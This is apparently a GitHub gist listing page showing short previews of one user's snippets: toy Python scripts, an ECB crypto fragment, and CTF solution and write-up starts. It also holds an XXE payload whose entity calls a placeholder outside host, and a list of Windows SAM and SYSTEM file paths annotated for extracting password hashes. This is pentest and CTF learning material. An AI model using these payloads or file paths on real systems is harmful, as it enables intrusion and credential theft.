Skip to content

Instantly share code, notes, and snippets.

View Evolution of a Python programmer.py
#Newbie programmer
def factorial(x):
if x == 0:
return 1
else:
return x * factorial(x - 1)
print factorial(6)
#First year programmer, studied Pascal
View dungeon.py
import random
def get_map(num1,num2):
result = []
idx = 0
try:
for x in range(num1):
for y in range(num2):
result.insert(idx,(x,y))
View ecb.py
from Crypto.Cipher import AES
import sys
import os
#Initial Vector ...
IV_SIZE = 16
#Block size ..
BLOCK_SIZE = 16
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@abdilahrf
abdilahrf / windows_blind
Created Jan 12, 2017 — forked from waywardsun/windows_blind
Windows Blind Files
View windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system
View custom-dns-server.py
import socket
import time
from twisted.internet.protocol import Factory, Protocol
from twisted.internet import reactor
from twisted.names import dns
from twisted.names import client, server
from twisted.internet import defer
class MyResolver(client.Resolver):
def lookupAllRecords(self, name, timeout=None):
View fastweb.py
import requests
from bs4 import BeautifulSoup
url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/"
soup = BeautifulSoup(requests.get(url).text,"lxml")
headers = {
'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
'content-type': "application/x-www-form-urlencoded",
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
@abdilahrf
abdilahrf / rfile_solution.py
Created May 23, 2017 — forked from rkmylo/rfile_solution.py
RCTF 2017 - rFile Solution
View rfile_solution.py
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
td = dt - epoch
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6
@abdilahrf
abdilahrf / rcdn_solution.py
Created May 23, 2017 — forked from rkmylo/rcdn_solution.py
RCTF 2017 - rCDN Solution
View rcdn_solution.py
# coding: utf-8
"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""
import re
import sys
import string
import requests
@abdilahrf
abdilahrf / gist:65bb60222cae8c2158004dbde27857ae
Created Jun 1, 2017
Codegate 2014 CTF, web "120" write-up
View gist:65bb60222cae8c2158004dbde27857ae

Task

You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, the same but ends with index.phps and is an alleged source code of the former, finally, index.php contains a link to auth.php

index.phps listing below

<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);